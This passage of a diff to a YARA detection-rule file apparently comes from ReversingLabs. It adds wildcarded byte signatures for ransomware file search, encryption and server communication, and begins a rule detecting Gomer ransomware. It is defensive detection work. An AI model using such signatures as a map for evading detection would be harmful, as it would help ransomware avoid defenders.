+            83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B F0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF D0 83 FF ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ??
+            ?? ?? 74 ?? 8B 0D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 51 ?? 8D 85 ?? ?? ?? ?? 50 52
+            8D 85 ?? ?? ?? ?? 50 EB ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ??
+            ?? ?? 50 8D 8D
+        }
+		$file_search_4_0_3 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33
+            CD 33 C0 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$file_search_4_1b_1 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 83 C4 ?? 68 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 52 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
+        }
+		$file_search_4_1b_2 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ?? ?? ?? ?? 83 FF ??
+            0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 48 ?? 8D 95 ?? ?? ?? ?? 52
+            51 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ??
+            ?? ?? 8B 1D
+        }
+		$file_search_4_1b_3 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ??
+            ?? 6A ?? 66 89 45 ?? 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 45 ?? ?? ?? ?? ??
+            FF D3 85 C0 74 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$server_communication_4_1b_1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8
+        }
+		$server_communication_4_1b_2 = {
+            E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 42 ?? 83 C4 ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            89 44 24 ?? 3B C3 75 ?? ?? ?? B8 ?? ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? 8D
+            ?? 24 ?? ?? ?? ?? 53 51 E8 ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F B6 ?? ?? ?? ?? ?? 0F
+            B6 ?? ?? ?? ?? ?? 83 C4 0C
+        }
+		$server_communication_4_1b_3 = {
+            8A 08 ?? ?? ?? 75 ?? 2B C6 50 57 8D ?? 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
+            8B CF 51 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D 78 ?? 8A 08 40
+            3A CB 75 ?? 2B C7 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D
+            84 0C ?? ?? ?? ?? 50 E8
+        }
+		$server_communication_4_1b_4 = {
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 94 24
+            ?? ?? ?? ?? 50 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 8C 24 ?? ?? ?? ?? 50 51 8D 94 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 53 53 6A ?? 53 53 6A ?? 8D 84 24 ??
+            ?? ?? ?? 50 51 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 ?? 3B F3 0F 84 ?? ?? ?? ?? 6A ?? 8D
+            54 24 ?? 52 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 48
+            ?? 8B 40 ?? 53 68 ?? ?? ?? ?? 51 53 53 8D 94 24 ?? ?? ?? ?? 52 50 56 FF 15
+        }
+		$server_communication_4_1b_5 = {
+            FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C
+            24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 15 ?? ?? ?? ?? 88 9C 04 ?? ??
+            ?? ?? 88 9C 04 ?? ?? ?? ?? 8B 42 ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 4C 24 ?? 51 FF D6 8B 7C 24 ?? 47 89 7C
+            24 ?? 83 FF ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15
+        }
+		$file_search_4_2_1 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ??
+            FF 70 ?? 8D 85 ?? ?? ?? ?? 50 FF D3 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15
+        }
+		$file_search_4_2_2 = {
+            FF D3 8B 35 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 8D 85 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 FF D7 6A ?? 8D 45 ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            66 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51
+            6A ?? FF D3
+        }
+		$server_communication_4_2_1 = {
+            FF 15 ?? ?? ?? ?? 8B F0 0F 57 C0 8D 84 24 ?? ?? ?? ?? 66 0F 7F 84 24 ?? ?? ?? ?? 50
+            8D 84 24 ?? ?? ?? ?? 8B D6 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8B CE E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            56 FF 15
+        }
+		$server_communication_4_2_2 = {
+            FF D7 8B 0D ?? ?? ?? ?? 8B D0 8B 49 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ??
+            50 FF D7
+        }
+		$server_communication_4_2_3 = {
+            6A ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 6A ?? 56 FF 54 24 ?? 8B 0D ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 41 ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 71
+            ?? 56 FF 54 24
+        }
+		$server_communication_4_2_4 = {
+            FF 54 24 ?? 8B 44 24 ?? 66 C7 84 04 ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? FF 70 ?? 8D 84
+            24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 8B 7C 24 ?? FF D7 56 FF
+            D7
+        }
+		$server_communication_4_2_5 = {
+            57 8B 7C 24 ?? FF D7 56 FF D7 FF 74 24 ?? FF D7 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            6A ?? FF 15
+        }
+		$server_communication_3_1 = {
+            8A 08 40 3A CB 75 ?? 2B C7 50 8D 94 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? EB
+        }
+		$server_communication_3_2 = {
+            68 ?? ?? ?? ?? 88 9C 04 ?? ?? ?? ?? 51 88 9C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 8B 7C 24 ?? 83 C7 ?? 89 7C 24 ??
+            81 FF ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 39 1D ?? ?? ??
+            ?? 75 ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15
+        }
+		$file_search_3_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? [0-1] 56 57 33 C0
+            68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8
+        }
+		$file_search_3_1_1 = {
+            FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ??
+            FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15
+        }
+		$file_search_3_1_2 = {
+            8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 8D ?? ?? ?? ?? 51 FF D7 6A ?? 8D 95 ?? ?? ?? ??
+            6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A
+            ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D
+            85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D3 85 C0 74 ?? E8
+        }
+		$file_search_3_2_1 = {
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            50 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ??
+            ?? ?? ?? 83 FF ?? 0F 85
+        }
+		$file_search_3_2_2 = {
+            8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ??
+            ?? FF D6 6A ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
+            51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? FF D7 85 C0 74 ?? E8
+        }
+		$search_and_encrypt_3_1 = {
+            8B C3 83 C4 ?? 8D 50 ?? [1-3] 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76
+            ?? 68 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ??
+            ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB
+        }
+		$search_and_encrypt_3_2 = {
+            1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66
+            3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2
+            75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0
+            ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
+        }
+		$search_and_encrypt_3_3 = {
+            1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 53
+            8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D ?? ??
+            ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ??
+            ?? ?? 68 ?? ?? ?? ?? ?? E8
+        }
+		$search_and_encrypt_3_4 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B CE E8
+            ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C6 E8 ??
+            ?? ?? ?? 83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"MPS\"" and ( pe.signatures [ i ] . serial == "00:ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" or pe.signatures [ i ] . serial == "ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" ) and 1582675200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_2_6a_1 and $encrypt_file_0_2_6a_2 and $server_communication_0_2_6a_1 and $server_communication_0_2_6a_2 ) or ( $file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_3_1 and $server_communication_0_3_1_1 and $server_communication_0_3_1_2 ) or ( $file_search_0_3_3_1 and $file_search_0_3_3_2 and $encrypt_file_0_3_3_1 and $encrypt_file_0_3_3_2 and $server_communication_0_3_3_1 and $server_communication_0_3_3_2 ) or ( $file_search_0_3_4a_1 and $file_search_0_3_4a_2 and $encrypt_file_0_3_4a_1 and $encrypt_file_0_3_4a_2 and $server_communication_0_3_4a_1 and $server_communication_0_3_4a_2 ) or ( $file_search_0_3_5a_1 and $file_search_0_3_5a_2 and $encrypt_file_0_3_5a_1 and $encrypt_file_0_3_5a_2 and $server_communication_0_3_5a_1 and $server_communication_0_3_5a_2 ) or ( $server_communication_2_0_4e and $search_and_encrypt_2_0_4e_1 and $search_and_encrypt_2_0_4e_2 and $search_and_encrypt_2_0_4e_3 and $search_and_encrypt_2_0_4e_4 and $search_and_encrypt_2_0_4e_5 ) or ( $server_communication_4_0_1 and $server_communication_4_0_2 and $server_communication_4_0_3 and $file_search_4_0_1 and $file_search_4_0_2 and $file_search_4_0_3 ) or ( $file_search_4_1b_1 and $file_search_4_1b_2 and $file_search_4_1b_3 and $server_communication_4_1b_1 and $server_communication_4_1b_2 and $server_communication_4_1b_3 and $server_communication_4_1b_4 and $server_communication_4_1b_5 ) or ( $file_search_4_2_1 and $file_search_4_2_2 and $server_communication_4_1b_1 and $server_communication_4_2_1 and $server_communication_4_2_2 and $server_communication_4_2_3 and $server_communication_4_2_4 and $server_communication_4_2_5 ) or ( $server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_1_1 and $file_search_3_1_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4 ) or ( $server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_2_1 and $file_search_3_2_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9813229Efe0046D23542Cc7569D5A403 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Gomer : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Gomer ransomware."
 		author = "ReversingLabs"
-		id = "0cf7573f-290d-58ac-989f-f82e9313d54e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "b76ac856-2abe-531d-b093-461569b9afb7"
+		date = "2020-10-08"
+		modified = "2020-10-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3676-L3694"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Gomer.yara#L1-L106"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0d8f0df83572b8d31f29cb76f44d524fd1ae0467d2d99af959e45694524d18e8"
+		logic_hash = "a53d37fcb877a12a4969a6ea1aaa67fc4106c3fbdd80a4fd39ad5a66a9df47fc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Gomer"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
+            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
+            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
+            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
+            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
+            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
+            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
+        }
+		$find_files_p2 = {
+            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
+            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
+            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
+            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
+            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
+            83 C4 ?? E9
+        }
+		$encrypt_files = {
+            55 8B EC 51 8B 45 ?? 53 56 57 8B F9 8B 4F ?? 89 4D ?? 3B C1 77 ?? 8B DF 83 F9 ?? 72
+            ?? 8B 1F 8D 34 00 89 47 ?? 56 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 1E
+            8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F0 83 CE ?? 81
+            FE ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B D1 B8 ?? ?? ?? ?? D1 EA 2B C2 3B C8 76
+            ?? BE ?? ?? ?? ?? EB ?? 8D 04 0A 3B F0 0F 42 F0 8D 46 ?? 8D 0C 00 3D ?? ?? ?? ?? 76
+            ?? 83 C9 ?? EB ?? 81 F9 ?? ?? ?? ?? 72 ?? 8D 41 ?? 83 CA ?? 3B C1 0F 46 C2 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 58 ?? 83 E3 ?? 89 43 ?? EB ?? 85 C9 74 ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B D8 EB ?? 33 DB 8B 45 ?? 89 77 ?? 89 47 ?? 8D 34 00 56 FF 75 ??
+            53 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 66 89 04 1E 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ??
+            ?? ?? 8B 07 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ??
+            8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1F 8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? CC CC CC CC CC B8 ?? ?? ?? ?? C3
+        }
+		$enum_drives_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? 33 C0 C7
+            45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6
+            45 ?? ?? BF ?? ?? ?? ?? 8D 45 ?? 0F A3 38 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D
+            47 ?? 0F 43 4D ?? 66 89 01 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83
+            F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 66 89 4D ?? C6 45 ?? ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ??
+            83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ??
+            ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE C6 45 ?? ?? F7 E9 83 C4 ?? C1 FA ?? 8B DA C1 EB
